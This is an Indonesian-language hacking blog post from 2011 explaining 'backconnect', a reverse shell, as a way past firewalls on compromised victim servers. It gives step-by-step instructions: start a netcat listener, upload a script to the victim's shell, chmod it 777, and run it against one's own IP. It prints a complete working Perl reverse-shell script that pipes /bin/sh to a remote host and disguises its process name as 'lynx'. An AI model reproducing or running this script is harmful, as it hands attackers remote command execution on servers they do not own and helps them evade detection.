Kamis, 20 Januari 2011

[BackDoor] BackConnect

[Backdoor] Backconnect

Kalau dithread sebelumnya bindshell adalah melakukan koneksi ke server korban dengan membuka port diserver. Maka backconnect beda. ingin tau kelanjutannya simak thread berikut.

Apa itu backconnect ?
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita.

Apa perbedaannya sama bindshell ?
bedanya, kalo backconnect adalah melakukan koneksi balik dari shell, ke komputer kita, jadi dikomputer kita diset Listening port.

Bagaimana cara penggunaannya ?
cara penggunanya hampir sama dengan bindshell cuma dibalik.

* BackConnect Lewat Shell
Yang harus dilakukan terlebih dahulu adalah upload script backconnectnya. disini saya menggunakan script perl untuk backconnect punyanya om ArRay.

1. Set mode listening dulu dinetcat anda:

ex: nc -vlp portnya
jadi: nc -vlp 13123

akan muncul tulisan: listening on [any] 13123 ...

2. Setelah itu upload script bindshell.pl nya dishell anda. kemudian ubah permissionnya menjadi 777. chmod 777 bindshell.pl

3. Jalankan perintah berikut dishell:

ex: perl bindshell.pl [ip_anda] [port]
jadi: perl bindshell.pl 192.168.202.4 13123

tunggulah beberapa saat, jika sudah connect ke kompi anda. maka selamat anda berhasil melakukan back-connect.

Script bindshell.pl nya:
Code:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
* Kendala yang sering terjadi yang mengakibatkan tidak bisa backconnect ke Kompie
Jadi begini ceritanya. misalkan anda sudah melakukan back-connect dengan berbagai cara tidak ada yang berhasil. maka kemungkinan kendala yang terjadi adalah sang admin/empunya server menutup fungsi Listening. (lock) jadi, dapat mengakibatkan gagal koneksi balik ke komputer kita. sehingga mendapatkan error connection refused/NOTSOCK dinetcat. CMIIW

Sumber:
Always With US BeaCheater

0 komentar:

Poskan Komentar